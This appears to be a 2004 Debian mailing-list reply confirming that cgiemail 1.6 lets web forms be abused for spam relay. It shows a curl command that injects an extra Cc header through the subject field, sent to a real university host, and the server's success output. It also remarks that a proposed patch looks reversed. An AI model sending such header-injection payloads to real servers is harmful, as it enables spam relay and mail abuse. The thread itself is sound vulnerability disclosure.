Re: cgiemail 1.6-14 vulnerable to spamming exploit (bug 222870)

[Matt Zimmerman <mdz@debian.org>]

On Fri, Jan 23, 2004 at 01:12:48PM +0200, Ian Forbes wrote:

> I discovered this morning that our web server has been exploited for the 
> relaying of spam. It has the latest "cgiemail" program distributed with 
> Debian installed on it.
> 
> First thing I did was disable the cgiemail executable to stop the flow 
> of spam. 
> 
> Then I did some research. This is not a totally new scenario. After a 
> little web searching I have found:
> 
> 1) An open bug report:
> http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=222870

In that bug report, the maintainer claims that the bug is not reproducible
with cgiemail 1.6, but it seems to work for me:

mizar:[~] curl -d 'email=mdz-junk@alcor.net&subject=foobar%0aCc:%20mdz-junk2@alcor.net' http://sikuani.its.monash.edu.au/cgi-bin/cgiemail/template/test
<HEAD><TITLE>Success</TITLE></HEAD>
<BODY>The following email message was sent.<P><HR><PRE>
From: mdz-junk@alcor.net
To: anibal@niquia.its.monash.edu.au
Subject: foobar
Cc: mdz-junk2@alcor.net

What is your name?              
What is your quest?             
What is your favourite colour?  
</PRE><P>
<P><EM>cgiemail 
1.6
</EM></BODY>

> 3) A patch which might fix the problem
> http://www.securityfocus.com/archive/1/340174

That patch is both in "normal" diff format, which makes it difficult to use and
read, and also seems to have been generated backwards, removing lines when it
should be adding them.  I cannot judge its correctness, either, though the
description of the solution seems valid.

-- 
 - mdz